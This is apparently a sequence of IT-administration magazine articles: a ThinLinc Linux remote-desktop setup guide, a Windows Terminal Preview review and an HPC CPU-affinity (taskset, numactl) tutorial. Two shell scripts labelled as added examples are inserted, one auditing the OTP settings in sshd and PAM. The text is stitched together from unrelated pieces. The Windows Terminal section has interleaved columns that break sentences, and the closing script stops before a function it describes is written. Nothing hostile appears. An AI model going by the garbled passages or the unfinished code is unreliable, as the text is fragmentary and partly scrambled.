The revival of terminal servers during the Covid-19 crisis depended on the IT administrator to enable home office workplaces, with the help of tools like ThinLinc, a Linux remote desktop server. By Holger Reibold

Photo by Clem Onojeghuo on Unsplash

The COVID-19 pandemic is credited with being a catalyst in the area of digitalization. Processes had to be digitalized within a very short time at a speed that previously seemed impossible. Virtually overnight, the importance of the role of IT administrator grew enormously, with administrators frequently benefiting from technologies that long since seemed outdated. Terminal services, an almost forgotten technology that allows home office workplaces to be set up with a minimum of time and effort, come from an age when clients were little more than simple character displays. For administrators, they are a welcome tool, because they allow simpler administration of centrally operated applications and settings than is the case with high-maintenance desktop computers.

The use of classic terminal server technologies with one (or more) central servers promises optimum utilization of a central server system instead of the often inefficient distribution to desktops. In principle, a server-based solution increases availability and, thus, ultimately security. Now 18 years old, ThinLinc is available in version 4.12 and includes both the server-based elements (session broker, load balancer, admin interface) and the end-user components (client software, customization tools). The interaction of these different components produces a complete solution that fulfills all requirements for a modern terminal environment.

In this article, I'll show you how to set up the software, adapt it to a Windows environment, and ensure access is protected.

Technical Foundation

In technical terms, ThinLinc is a Linux remote desktop server that primarily uses open source software such as TigerVNC, noVNC, OpenSSH, common Unix printing system (CUPS), and PulseAudio. From these tools, the developer, Cendio of Linköping, Sweden, developed a robust, stable environment for server-based computing.

ThinLinc provides the resources of the Linux server in use by converting a regular Linux distribution into a remote desktop server, which simplifies typical tasks for administrators because they only need to keep the server in mind, making it much easier to monitor the environment.

In principle, ThinLinc supports all Linux distributions that use the RPM or DPKG package managers. The tool's system architecture is based on a typical client-server architecture designed in such a way that the terminal server can be integrated effortlessly into an existing IT infrastructure (Figure 1). Apart from regular system authentication, integration of NetIQ eDirectory identity infrastructure management, Active Directory (AD), Network Information Service (NIS), and other elements is also possible. ThinLinc uses pluggable authentication modules (PAM) for authentication.

Figure 1: New terminals can be created and printers shared in the admin web interface.

The software supports clustering and offers high availability and load balancing. To ensure high availability, two systems act as virtual systems management (VSM) servers. If a system is down, the VSM server handles requests so as to ensure that no or only minor disruptions to services occur. Load balancing distributes the user sessions uniformly to the servers in a ThinLinc cluster, with the servers burdened equally insofar as is possible.

The architecture is characterized by the master, agent, and client. The ThinLinc master server (vsmserver) is responsible for initial authentication and selection of the terminal server. To do this, it tracks all sessions and distributes the load to several agents in a cluster. Its task is also to ensure that the clients receive the relevant session information.

The tasks of the ThinLinc agent (vsmagent) include starting and hosting the processes from which a session is generated. The agent also establishes tunnels for graphical and local devices. The tunnels are multiplexed for each user by means of a Secure Shell (SSH) connection. Finally, the client establishes two connections: one with the master first, and then another with the agent that the master qualifies as being optimal.

Installation Preparations

Before performing the installation, you should check the Linux server system you want to use with ThinLinc to make sure it fulfills the necessary system requirements. The hardware side has no special requirements. The server configuration should be guided primarily by the requirements that users place on the environment. To provide every user with a KDE or Gnome desktop, you need to ensure around 200MB of storage space in each case. Much more important is the availability of RPM support, SSH, and a correct Network Time Protocol (NTP) configuration.

ThinLinc is offered under a proprietary license, but the developers provide a demo version for download that is limited to five users working simultaneously. The cost for five to 10 users is $78 per year per user and for 11 to 49 users is $66 per year per user. To install, download the ZIP archive from the ThinLinc website [1], unpack it into a directory of your choice, and start the installation script with:

sh ./install-server

If you have a valid license, save the relevant text file with the file extension .license in the /opt/thinlinc/etc/licenses directory. In principle, the basic system is now ready for use. You can install the printer as a next step or set up web access.

Configuring Printers with CUPS

Despite the increased acceptance of the paperless office, printing documents remains an important function that a central server solution also needs to support. According to the project website, ThinLinc is used in particular in university and official contexts, and the option of printing is especially required in the latter case despite growing digitalization. The tool therefore relies on the renowned CUPS print server for print functionality.

ThinLinc essentially offers two variants: access to a local printer or to the nearest printer. In the first case, you have two operating modes: device-independent and device-dependent. The two can be combined.

You need to revert to the ThinLinc setup to install the PDF conversion filter, the back end, and the queue in CUPS on all machines. The setup adds a new queue called thinlocal to the CUPS server and makes it available to the users. The thinlocal printer is cluster-enabled: If a user sends a print request to a node in a ThinLinc cluster that is not hosting the user session, the print request is forwarded automatically to a suitable node.

The local printer is ready to use once the installation is complete; you only need to ensure in the ThinLinc client configuration that the diversion has been activated.

Implementing Single App Access

ThinLinc offers various possibilities that are not all recognizable at first glance. Instead of a complete desktop, you can limit the user environment to a single application – a very interesting option from a security perspective. In practice, you can limit access, for example, to a web browser. Only web-based access with Firefox is then available to employees.

For this purpose, changes are needed to the ThinLinc configuration under /opt/thinlinc/etc/conf.d. To do so, generate a new profile by editing the profiles.hconf file, which could look as follows in an instance where Firefox is the only permitted application:

[/profiles/firefox]
name=Firefox
description=Example configuration of single app access to ThinLinc
cmdline=${TLPREFIX}/bin/tl-single-app firefox
testcmd=type firefox

You must also add the new profile to the order parameter:

order=firefox

After saving and restarting the ThinLinc server, the new profile is available from the profile selection.

Adapting to Windows

The option of accessing Active Directory and a Windows file server is important for integration in a heterogeneous network environment. First, you must install various components on the ThinLinc clients:

yum install realmd sssd oddjob oddjob-mkhomedir adcli samba-common-tools krb5-workstation

The next step is to activate collaboration with the Windows DNS service so that the AD domain can be recorded correctly. Listing 1 shows what this must look like. To join the domain and provide the admin password for access and verify the user resolution in Active Directory, use the commands:

realm join <domain>
id testuser@<domain>

Listing 1: Windows Integration

[localhost]# realm discover <Domain>
DOMAIN
  type: kerberos
  realm-name: <Domain>
  domain-name: <Domain>
  configured: no
  server-software: active-directory
  client-software: sssd
  required-package: oddjob
  required-package: oddjob-mkhomedir
  required-package: sssd
  required-package: adcli
  required-package: samba-common-tools

Additionally, the system security services daemon (SSSD) configuration sssd.conf must be adapted to make ThinLinc recognizable as a service. To do this, edit the file /etc/sssd/sssd.conf and add the line:

ad_gpo_map_remote_interactive = +thinlinc

The changes take effect after entering

systemctl restart sssd

to restart SSSD.

Enhancing Access Security

When accessing the ThinLinc server, you have the option of using two-factor authentication, a one-time password (OTP), or a standard password for authentication. The procedure for enabling OTP authentication for accessing ThinLinc starts with installing the Google Authenticator:

sudo dnf install google-authenticator

Next, configure SSHD so that the daemon permits authentication by editing the file /etc/ssh/sshd_config and activating the ChallengeResponseAuthentication option:

# Change to no to disable s/key passwords
ChallengeResponseAuthentication yes

This system modification also takes effect after a restart. The next step involves configuring the interaction between PAM and Google Authenticator. To do this, edit the file /etc/pam.d/thinlinc and make the changes shown in Listing 2.

Listing 2: /etc/pam.d/thinlinc

#%PAM-1.0
auth required pam_sepermit.so
auth substack password-auth
auth required pam_google_authenticator.so nullok
auth include postlogin
account required pam_sepermit.so
account required pam_nologin.so

After installing Google Authenticator on the terminal, the user still needs to activate OTP functionality on the ThinLinc server. To do this, execute the google-authenticator program, which opens an interactive dialog. During configuration, a QR code is output that the user scans with the terminal device to activate the functionality.

Access in a Web Client

ThinLinc also provides a web client. For this purpose, it uses noVNC, a VNC client JavaScript library. Both administrators and users benefit from the fact that noVNC [2] can be executed in mobile environments like Android and iOS. The advantage for the user is clear: The installation of the ThinLinc client is not absolutely necessary, and nothing hinders access by mobile terminals. Although "traditional" ThinLinc clients all use SSH for encrypting the client-server connection, the web client uses TLS as a protocol. noVNC provides HTML5 functionality. Implementation of bring-your-own-device policies is therefore also possible.

Summary

Terminal environments are experiencing a revival as a result of the COVID-19 crisis. Administrators can draw on a considerable range of commercial and free tools for solutions. However, companies must decide whether a commercial tool, such as ThinLinc, is worthwhile or whether it would be better to use a free remote desktop tool like UltraVNC. Compared directly, they are not significantly different. A ThinLinc license makes sense primarily where companies are dependent on timely support.

Info
[1] ThinLinc: [https://www.cendio.com/thinlinc/what-is-thinlinc]
[2] noVNC: [https://novnc.com/info.html]
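As an added example (not ThinLinc's code or the article's own), a small POSIX shell audit of the two files the OTP procedure edits: it reports the effective ChallengeResponseAuthentication value in an sshd_config and whether the pam_google_authenticator.so line in a PAM stack such as /etc/pam.d/thinlinc carries nullok, which lets a user who has not yet enrolled a token log in with the password alone. File paths are parameters, and the sample files it writes are constructed copies of the fragments shown above.

```shell
#!/bin/sh
# Added example, not ThinLinc's or the article's own code: audit the two
# files the OTP procedure edits. Paths are passed as arguments so the
# checks can run against copies; the sample files below are constructed.

# Effective value of ChallengeResponseAuthentication in an sshd_config.
# sshd uses the first uncommented occurrence of a keyword, so that is the
# one reported. Newer OpenSSH spells the option KbdInteractiveAuthentication
# and keeps the old name as an alias, so both are accepted. Prints "unset"
# when neither appears.
sshd_challenge_response() {
    awk 'tolower($1) == "challengeresponseauthentication" ||
         tolower($1) == "kbdinteractiveauthentication" {
             print tolower($2); found = 1; exit
         }
         END { if (!found) print "unset" }' "$1"
}

# State of the Google Authenticator line in a PAM stack: "enforced" when an
# auth line loads pam_google_authenticator.so without nullok, "nullok" when
# that option is present (users with no enrolled token then log in by
# password alone), "missing" when the module is not in the stack at all.
pam_otp_status() {
    awk 'tolower($1) == "auth" && $0 ~ /pam_google_authenticator\.so/ {
             if ($0 ~ /nullok/) print "nullok"; else print "enforced"
             found = 1; exit
         }
         END { if (!found) print "missing" }' "$1"
}

# Combined verdict: exit 0 only when sshd accepts keyboard-interactive
# logins and the PAM stack enforces the OTP; otherwise list the findings
# on stderr and exit 1.
audit_otp() {
    sshd_cfg=$1; pam_file=$2; rc=0
    if [ "$(sshd_challenge_response "$sshd_cfg")" != "yes" ]; then
        echo "$sshd_cfg: ChallengeResponseAuthentication is not yes" >&2; rc=1
    fi
    case "$(pam_otp_status "$pam_file")" in
        enforced) ;;
        nullok)  echo "$pam_file: pam_google_authenticator.so has nullok, OTP is optional" >&2; rc=1 ;;
        missing) echo "$pam_file: pam_google_authenticator.so not in the auth stack" >&2; rc=1 ;;
    esac
    return $rc
}

# Constructed copies of the files as the article leaves them: the listing's
# PAM stack (with nullok) and an sshd_config whose commented default is
# followed by the activated option.
write_sample_configs() {
    dir=$1
    cat > "$dir/sshd_config" <<'EOF'
#ChallengeResponseAuthentication no
# Change to no to disable s/key passwords
ChallengeResponseAuthentication yes
EOF
    cat > "$dir/thinlinc" <<'EOF'
#%PAM-1.0
auth required pam_sepermit.so
auth substack password-auth
auth required pam_google_authenticator.so nullok
auth include postlogin
account required pam_sepermit.so
account required pam_nologin.so
EOF
}
```

Run audit_otp /etc/ssh/sshd_config /etc/pam.d/thinlinc on the server once every user has enrolled a token and nullok has been removed; until then it reports the OTP as optional.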
Windows Terminal Preview TO O L S

New features in Windows Terminal Preview

Quick Shell
Windows Terminal Preview comes with interesting new features, such as interface (Figure 1). Depending on
the Preview version you use, some
state-preserving quick windows access via shortcuts and configuration very detailed settings might still need
of almost all settings in a GUI, which is reason enough to take a look at to be edited directly in the JSON file.
the preview. By Rainer W. Gerling Whether this will change by the time
the final 2.0 version is released re-
mains to be seen. Note that the key
You can pick up both the current Configuration (Almost) names are localized if you change the
version of Windows Terminal interface language, but the JSON file
and Windows Terminal Preview
Without an Editor always uses the English expressions.
from the Microsoft Store [1]. Al- One important innovation is the The profiles for the command
ternatively, a manual install from graphical interface for configuring the prompt, PowerShell, Windows Sub-
GitHub [2] is also possible; make tool. It was already included in the system for Linux, and Azure Cloud
sure you choose the version with current version, although with sig- Shell are always generated automati-
the highest release number. At the nificantly reduced functionality. Most cally if the respective feature is avail-
end of the description, you will find settings can be made in the graphical able. Deleting these profiles will not
the Assets item, which you should
expand if you do not see any file
links there. A click on the line with
the file name ending with msix-
bundle starts the download of the
installation package – or the instal-
lation, depending on your browser
settings. If you install from the
Microsoft Store, the applications are
updated automatically.
Photo by Mohamed Shaffaf on Unsplash

For this article, I looked at the Win-


dows Terminal Preview, which at
the time was version 1.10.1933.0
with the then current Stable version
at 1.9.1942.0. Both the Preview and
Stable versions can be used in paral-
lel with separate settings. Figure 1: The graphical user interface for configuring the Windows Terminal Preview.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 67 43
TOOLS Windows Terminal Preview

do you any good because they will just be created again. However, you can disable them by enabling the Hide profile from dropdown option. The settings in Defaults apply to all profiles. Exceptions are configured in the individual Profiles panes.

The interface is most likely not final and could still change by version 2.0, but one thing that should remain is that right-clicking on a window tab opens a menu for customizing the tab.

Quake Mode

One very practical function is the new Quake window. A keyboard shortcut can be used to start the Windows terminal with the default profile in the upper half of the screen and immediately move it to the foreground. Pressing the same shortcut causes it to disappear again. Between calls, the state remains. The default shortcut for this is Win+`, which can cause collisions with the default key combination of the FancyZones editor from Microsoft.

As a prerequisite for the Quake window, an instance of the Windows Terminal must be running. In this context, the setting to start Windows Terminal with the user's login is very practical. The current Stable version already supports Quake mode. In the Preview version, an icon is visible in the taskbar, but not in the Stable version.

Key Bindings Become Actions

In the Actions sidebar item, dubbed Key bindings in earlier versions, you can configure the shortcuts between the key combinations and the Windows terminal commands. They can be adjusted conveniently in the graphical configuration interface, which also gives you access to the JSON file (bottom menu item) that stores all settings. Therefore, you can easily transfer the customized actions to another computer.

To define actions, select Settings | Actions. A click on the pencil icon (which appears when you hover over the line in question) lets you change the keyboard shortcut. After making changes, don't forget to press the Save button. Note that the selection accessible from the command palette in the standard menu is used for executing the commands and not for configuring the settings. You can also reach the command palette with the Ctrl+Shift+P shortcut and then select an action from the menu or type the command in a kind of internal command line.

Great Window Management

Quake mode is a special case of the globalSummon action that also has an effect outside the terminal because it can be used to move the last terminal window you used to the foreground. Parameters like desktop, monitor, and name let you control exactly what happens when you use multiple monitors, multiple virtual desktops, or both.

The desktop parameter supports the any, toCurrent, and onCurrent options. Use of the any option means that the shortcut changes to the desktop on which the terminal window is open; the toCurrent option moves the terminal window to the current desktop, no matter which desktop it is on right now; and onCurrent moves the terminal window to the foreground if it is on the current desktop. Otherwise, a new window opens with the default profile on the current desktop.

The monitor parameter has the any, toCurrent, and toMouse options, where any keeps the terminal window on the display on which it is currently open, but moves it to the foreground; toCurrent drags the terminal window to the screen where the focused Windows window is, regardless of which monitor it is currently displayed on; and toMouse moves the terminal window to the monitor that holds the mouse pointer.

If you do not specify the name parameter, the action refers to the last terminal window you used. Otherwise, the parameter moves the terminal window with the specified name to the screen. Listing 1 shows two examples. The parameters can only be entered directly in the JSON file.

Listing 1: globalSummon Examples

    {
      "command":
      {
        "action": "globalSummon",
        "desktop": "onCurrent",
        "monitor": "any"
      },
      "keys": "ctrl+1"
    },
    {
      "command":
      {
        "action": "globalSummon",
        "desktop": "onCurrent",
        "monitor": "toMouse",
        "name": "Debian"
      },
      "keys": "ctrl+2"
    }

Clickable Links and Default Shell

In the interface under Interaction, you can use the Automatically detect URLs and make them clickable action to determine whether or not identified URLs will be clickable. If so, the URL can then be opened directly by control-clicking.

Up to now, the default shell in Windows is the command prompt. However, you can also set Windows Terminal Preview as the default shell. Microsoft still refers to this feature as alpha, and it requires a Windows 10 Developer version (22000.65 or higher) because the default shell is defined in the operating system itself and not in Windows Terminal.

If you are using a suitable Developer version, start the command prompt or Windows PowerShell and call Command Prompt Properties or Windows PowerShell Properties in the menu. When you get there, you will find a new Terminal tab where you can configure the terminal colors and cursor shape. If your Windows version is not up to date, you will see an empty space in
the lower right corner (the red frame in Figure 2 shows the space for the setting option). If your Windows version is up to date, you can configure Windows Terminal Preview as the default shell.

Conclusions

The command prompt in the form of the terminal is far from dead and is under active development. In Windows Terminal, Microsoft has created a state-of-the-art command prompt with a wide range of configuration options. The additional integration of PowerShell, Windows Subsystem for Linux, and Azure Cloud Shell is a success. The customization options leave little to be desired. It is evident that Microsoft is looking to encourage professional users who prefer to use Linux to bind more strongly to Windows. The complete documentation for Windows Terminal (Preview) can be found online [3].

Figure 2: Although the current Windows 11 already has an option to set the default shell, it is still missing in Windows 10.

Info
[1] Windows Terminal Preview in Microsoft Store: [https://www.microsoft.com/en-us/p/windows-terminal-preview/9n8g5rfz9xk3]
[2] Windows Terminal Preview on GitHub: [https://github.com/microsoft/terminal/releases]
[3] More information on Windows Terminal: [https://docs.microsoft.com/en-us/windows/terminal/]

The Author
Rainer W. Gerling is a theoretical physicist and a data privacy and IT security expert. He has been professionally involved in information technology for more than 40 years, and in 1986 he published one of the first articles in Germany on computer viruses. From 1993 until his retirement in 2020, he was the data privacy officer and CISO of the Max-Planck-Gesellschaft (Max Planck Society). Today he teaches Information Security at the Munich University of Applied Sciences.
TOOLS Processor Affinity Tools

CPU affinity in OpenMP and MPI applications

Bindings

Get better performance from your nodes by binding processes and associating memory to specific cores. By Jeff Layton

It's called high-performance computing (HPC), not low-performance computing (LPC), not medium-performance computing (MPC), and not even really awful-performance computing (RAPC). The focus is doing everything possible to get the highest performance possible for your applications.

Needless to say, but I will say it anyway, processors and systems have gotten very complicated. Individual CPUs can have 64+ cores, and this number is growing. They are being packaged in different ways, including multichip modules [1] with memory controllers connected in various locations, multiple memory channels, multiple caches sometimes shared across cores, chip and module interconnections, network connections, Peripheral Component Interconnect Express (PCIe) switches, and more. These elements are connected in various ways, resulting in a complex non-uniform memory access (NUMA) [2] architecture.

To get the best possible performance, you want the best bandwidth and least latency between the processing elements and between the memory and processors. You want the best performance from the interconnect between processing elements, the interconnect among processing and memory elements and accelerators, and the interconnect among the processors and accelerators to external networks. Understanding how these components are connected is a key step for improving application performance.

Compounding the challenge of finding the hardware path for best performance is the operating system. Periodically, the operating system runs services, and sometimes the kernel scheduler will move running processes from a particular processor to another as a result. Then your carefully planned hardware path can be disrupted, resulting in poor performance.

I have run all types of code on my workstation and various clusters, including serial, OpenMP, OpenACC, and MPI code. I carefully watch the load on each core with GkrellM [3], and I can see the scheduler move processes from one core to another. Even when I leave one to two cores free for system processes, with the hope that processes won't be moved, I still see the processes move from one core to another. In my experience, when running serial code, it only stays on a particular core for a few seconds before being moved to another core.

When a process move takes place, the application is "paused" while its state moves from one processor to another, which takes time and slows the application. After the process is moved, it could be accessing memory from another part of the system that requires traversing a number of internal interconnects, reducing the memory bandwidth, increasing the latency, and negatively affecting performance. Remember, it's not LPC, it's HPC.

Fortunately, Linux has developed a set of tools and techniques for "pinning" or "binding" processes to specific cores while associating memory to these cores. With these tools, you can tell Linux to run your process on very specific cores or limit the movement of the processes, as well as control where memory is allocated for these cores.

In this article, I present tools you can use for binding processes. In "Processor Affinity for OpenMP and MPI" (online) [4], I show how they can be used with OpenMP and MPI applications.
Example Architecture

I'll use a simple example of a single-socket system with an AMD Ryzen Threadripper [5] 3970X CPU that has simultaneous multithreading (SMT) turned on.

A first step in understanding how the processors are configured is to use the command lscpu. The output of the command on the example system is shown in Listing 1.

Listing 1: lscpu

    $ lscpu
    Architecture:                    x86_64
    CPU op-mode(s):                  32-bit, 64-bit
    Byte Order:                      Little Endian
    Address sizes:                   43 bits physical, 48 bits virtual
    CPU(s):                          64
    On-line CPU(s) list:             0-63
    Thread(s) per core:              2
    Core(s) per socket:              32
    Socket(s):                       1
    NUMA node(s):                    1
    Vendor ID:                       AuthenticAMD
    CPU family:                      23
    Model:                           49
    Model name:                      AMD Ryzen Threadripper 3970X 32-Core Processor
    Stepping:                        0
    Frequency boost:                 enabled
    CPU MHz:                         2198.266
    CPU max MHz:                     3700.0000
    CPU min MHz:                     2200.0000
    BogoMIPS:                        7400.61
    Virtualization:                  AMD-V
    L1d cache:                       1 MiB
    L1i cache:                       1 MiB
    L2 cache:                        16 MiB
    L3 cache:                        128 MiB
    NUMA node0 CPU(s):               0-63
    Vulnerability Itlb multihit:     Not affected
    Vulnerability L1tf:              Not affected
    Vulnerability Mds:               Not affected
    Vulnerability Meltdown:          Not affected
    Vulnerability Spec store bypass: Mitigation; Speculative Store Bypass disabled via prctl and seccomp
    Vulnerability Spectre v1:        Mitigation; usercopy/swapgs barriers and __user pointer sanitization
    Vulnerability Spectre v2:        Mitigation; Full AMD retpoline, IBPB conditional, STIBP conditional, RSB filling
    Vulnerability Srbds:             Not affected
    Vulnerability Tsx async abort:   Not affected
    Flags:                           fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat
                                     pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb
                                     rdtscp lm constant_tsc rep_good nopl nonstop_tsc cpuid extd_apicid
                                     aperfmperf pni pclmulqdq monitor ssse3 fma cx16 sse4_1 sse4_2 movbe
                                     popcnt aes xsave avx f16c rdrand lahf_lm cmp_legacy svm extapic
                                     cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ibs skinit wdt
                                     tce topoext perfctr_core perfctr_nb bpext perfctr_llc mwaitx cpb
                                     cat_l3 cdp_l3 hw_pstate sme ssbd mba sev ibpb stibp vmmcall fsgsbase
                                     bmi1 avx2 smep bmi2 cqm rdt_a rdseed adx smap clflushopt clwb sha_ni
                                     xsaveopt xsavec xgetbv1 xsaves cqm_llc cqm_occup_llc cqm_mbm_total
                                     cqm_mbm_local clzero irperf xsaveerptr wbnoinvd arat npt lbrv
                                     svm_lock nrip_save tsc_scale vmcb_clean flushbyasid decodeassists
                                     pausefilter pfthreshold avic v_vmsave_vmload vgif umip rdpid
                                     overflow_recov succor smca

The output notes 64 CPUs and two threads per core, which indicates that SMT is turned on, which means 32 "real" cores and 32 SMT cores. Also note the single socket and one NUMA node. The output also lists the L1d cache as 1MiB, the L1i cache as 1MiB, the L2 cache as 16MiB, and the L3 cache as 128MiB. However, it doesn't tell you how the caches are associated with cores.

One way to get most of this information in a more compact form is shown in Listing 2.

Listing 2: Compact lscpu

    $ lscpu | egrep 'Model name|Socket|Thread|NUMA|CPU\(s\)'
    CPU(s):                          64
    On-line CPU(s) list:             0-63
    Thread(s) per core:              2
    Socket(s):                       1
    NUMA node(s):                    1
    Model name:                      AMD Ryzen Threadripper 3970X 32-Core Processor
    NUMA node0 CPU(s):               0-63

An important question to be answered is: Which cores are "real," and which cores are SMT? One way is to look at the /sys filesystem for the CPUs:

    $ cat /sys/devices/system/cpu/cpu0/topology/thread_siblings_list
    0,32

If the first number in the output [6] is equal to the CPU number in the command, then it's a real core. If not, it is an SMT core. For the example command, the CPU number in the command is 0 and the first number is also 0. This makes it a real core.

Listing 3: Real or SMT? Method 1

    $ cat /sys/devices/system/cpu/cpu1/topology/thread_siblings_list
    1,33
    $ cat /sys/devices/system/cpu/cpu30/topology/thread_siblings_list
    30,62
    $ cat /sys/devices/system/cpu/cpu31/topology/thread_siblings_list
    31,63
    $ cat /sys/devices/system/cpu/cpu32/topology/thread_siblings_list
    0,32
    $ cat /sys/devices/system/cpu/cpu33/topology/thread_siblings_list
    1,33

Now try the command on a few other CPUs (Listing 3). The first command
looks at CPU 1, and it's a real core (the CPU number is 1, and the first number in the output is 1, which matches). CPU 30 and 31 are also both real cores. However, when the command is run on CPU 32, the first number in the output is 0. Because 0 does not match 32, it is an SMT core. The same is also true on CPU 33.

You can also use the first number in the output for the SMT cores as the real core with which it is associated. For example, CPU 32 is associated with CPU 0 (the first number in the output). So CPU 0 is the real core and CPU 32 is the SMT core in the pair.

Understanding the numbering of the real and SMT cores is important, but you have another way to check whether the CPU is real or SMT. Again, it involves examining the /sys filesystem (Listing 4).

Listing 4: Real or SMT? Method 2

    $ cat $(find /sys/devices/system/cpu -regex ".*cpu[0-9]+/topology/thread_siblings_list") | sort -n | uniq
    0,32
    1,33
    2,34
    3,35
    4,36
    5,37
    6,38
    7,39
    8,40
    9,41
    10,42
    11,43
    12,44
    13,45
    14,46
    15,47
    16,48
    17,49
    18,50
    19,51
    20,52
    21,53
    22,54
    23,55
    24,56
    25,57
    26,58
    27,59
    28,60
    29,61
    30,62
    31,63

The output from the command is in pairs, listing the real CPU number first and the associated SMT CPU number last. The first line of the output says that CPU 0 is the real core and CPU 32 is the SMT CPU. Really it's the same as the previous command, except it lists all of the cores at once.

The lstopo tool can give you a visual layout of the hardware along with a more detailed view of the cache layout (Figure 1). This very useful command returns the hardware layout of your system. Although it can include PCIe connections as well, I've chosen not to display that output.

Figure 1: lstopo output for sample systems.

Notice in the figure that each 16MB L3 cache has four groups of two cores. The first core in each pair is the real core and the second is the SMT core. For example, Core L#0 has two processing units (PUs), where PU L#0 is a real core listed as P#0 and PU L#1 is the SMT core listed as P#32. Each group of two cores has an L2 cache of 512KB, an L1d (data) cache of 32KB, and an L1i (instruction) cache of 32KB. The eight L3 cache "groups" make a total of 64 cores with SMT turned on.

Affinity Tools

In this article, I discuss two Linux tools that allow you to set and control the application threads (processes), giving you great flexibility to achieve the performance you want. For example, a great many applications need memory bandwidth. The tools allow you to make sure that each thread gets the largest amount of memory bandwidth possible.

If network performance is critical to application performance (think MPI applications), with these tools, you can bind threads to cores that are close to a network interface card (NIC), perhaps not crossing a PCIe switch. Alternatively, you can bind processes to cores that are as close as possible to accelerators to get the maximum possible PCIe bandwidth.

The Linux tools presented here allow you to bind processes and memory to cores; you have to find the best way to use these tools for the best possible application performance.

taskset

The taskset command [7] is considered the most portable Linux way of setting or retrieving the CPU affinity (binding) of a running process (thread). According to the taskset man
page, "The Linux scheduler will honor the given CPU affinity and the process will not run on any other CPUs."

An example of executing a process with the taskset command is:

    $ taskset --cpu-list 0,2 application.exe

This command sets the affinity of application.exe to cores 0 and 2 and then executes it. You can also use the short version of the --cpu-list option, -c.

If you want to change the affinity of a running process, you need to get the process ID (PID) of the processes with the --pid (-p) option. For example, if you have an application with four processes (or four individual processes), you get the PIDs of each process and then run the following command to move them to cores 10, 12, 14, and 16:

    $ taskset --pid --cpu-list 10 [pid1]
    $ taskset --pid --cpu-list 12 [pid2]
    $ taskset --pid --cpu-list 14 [pid3]
    $ taskset --pid --cpu-list 16 [pid4]

numactl

One key tool for pinning processes is numactl [8], which can be used to control the NUMA policy for processes, shared memory, or both. One key thing about numactl is that, unlike taskset, you can't use it to change the policy of a running application. However, you can use it to display information about your NUMA hardware and the current policy (Listing 5). Note for this system, SMT is turned on, so the output shows 64 CPUs.

Listing 5: numactl

    $ numactl --hardware
    available: 1 nodes (0)
    node 0 cpus: 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63
    node 0 size: 64251 MB
    node 0 free: 60218 MB
    node distances:
    node   0
      0:  10

The system has one NUMA node (available: 1 nodes), and all 64 cores are associated with that NUMA node. Because there is only one NUMA node, the node distance from NUMA node 0 to NUMA node 0 is listed as 10, which indicates it's the same NUMA node. The output from the command also indicates it has 64GB of memory (node 0 size: 64251 MB).

The advantages of numactl come from its ability to place and bind processes, particularly in relation to where memory is allocated, for which it has several "policies" that are implemented as options to the command:

- The --interleave=<nodes> policy has the application allocate memory in a round-robin fashion on "nodes." With only two NUMA nodes, this means memory will be allocated first on node 0, followed by node 1, node 0, node 1, and so on. If the memory allocation cannot work on the current interleave target node (node x), it falls back to other nodes but in the same round-robin fashion. You can control which nodes are used for memory interleaving or use them all:

      $ numactl --interleave=all application.exe

  This example command interleaves memory allocation on all nodes for application.exe. Note that the sample system in this article has only one node, node 0, so all memory allocation uses it.

- The --membind=<nodes> policy forces memory to be allocated from the list of provided nodes (including the all option):

      $ numactl --membind=0,1 application.exe

  This policy causes application.exe to use memory from node 0 and node 1. Note that a memory allocation can fail if no more memory is available on the specified node.

- The --cpunodebind=<nodes> option causes processes to run only on the CPUs of the specified node(s):

      $ numactl --cpunodebind=0 --membind=0,1 application.exe

  This policy runs application.exe on the CPUs associated with node 0 and allocates memory on node 0 and node 1. Note that the Linux scheduler is free to move the processes to CPUs as long as the policy is met.

- The --physcpubind=<CPUs> policy executes the process(es) on the list of CPUs provided:

      $ numactl --physcpubind=+0-4,8-12 application.exe

  You can also say all, and it will use all of the CPUs. This policy runs application.exe on CPUs 0-4 and 8-12.

- The --localalloc policy forces allocation of memory on the current node:

      $ numactl --physcpubind=+0-4,8-12 --localalloc application.exe

  This policy runs application.exe on CPUs 0-4 and 8-12, while allocating memory on the current node.

- The --preferred=<node> policy causes memory allocation on the node you specify, but if it can't, it will fall back to using memory from other nodes. To set the preferred node for memory allocation to node 1, use:

      $ numactl --physcpubind=+0-4,8-12 --preferred=1 application.exe

  This policy can be useful if you want to keep application.exe running, even if no more memory is available on the current node.
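Two checks worth scripting once you start binding with taskset or numactl: the real-versus-SMT test from Listings 3 and 4, and a comparison of the CPU list you asked for against the Cpus_allowed_list the kernel actually records for the process in /proc/PID/status (the same data taskset -p reports). The script below is an added example, not from the article or from either tool; SYSFS_ROOT and the make_fake_sysfs helper are assumptions so that the functions can be exercised against a constructed topology rather than the live /sys.

```shell
#!/bin/sh
# Added example: classify CPUs as real or SMT from thread_siblings_list,
# expand the "0-4,8-12" list syntax accepted by taskset --cpu-list and
# numactl --physcpubind, and verify a process's actual affinity.
# SYSFS_ROOT is an assumption: it defaults to /sys but can point at a
# constructed tree for testing.
SYSFS_ROOT=${SYSFS_ROOT:-/sys}

# siblings_of CPU -> contents of cpuCPU/topology/thread_siblings_list
siblings_of() {
    cat "$SYSFS_ROOT/devices/system/cpu/cpu$1/topology/thread_siblings_list"
}

# classify_cpu CPU SIBLINGS -> "real" if the first sibling is CPU itself,
# otherwise "smt" (the first number names the real core it belongs to)
classify_cpu() {
    if [ "${2%%,*}" = "$1" ]; then echo real; else echo smt; fi
}

# expand_cpulist LIST -> ascending, space-separated CPU numbers.
# Items are N or N-M; a leading "+" (numactl's cpuset-relative form) is
# dropped so that "+0-4,8-12" and "0-4,8-12" expand to the same set.
expand_cpulist() {
    list=${1#+}; out=""
    oldifs=$IFS; IFS=,
    for item in $list; do
        case $item in
            *-*) lo=${item%-*}; hi=${item#*-} ;;
            *)   lo=$item; hi=$item ;;
        esac
        n=$lo
        while [ "$n" -le "$hi" ]; do out="$out $n"; n=$((n + 1)); done
    done
    IFS=$oldifs
    # Sort numerically and drop duplicates so "2,0-2" and "0-2" compare equal.
    printf '%s\n' $out | sort -n | uniq | tr '\n' ' ' | sed 's/ $//'
}

# describe_cpulist LIST -> one line per CPU in LIST:
# "cpuN real" or "cpuN smt (sibling of cpuM)"
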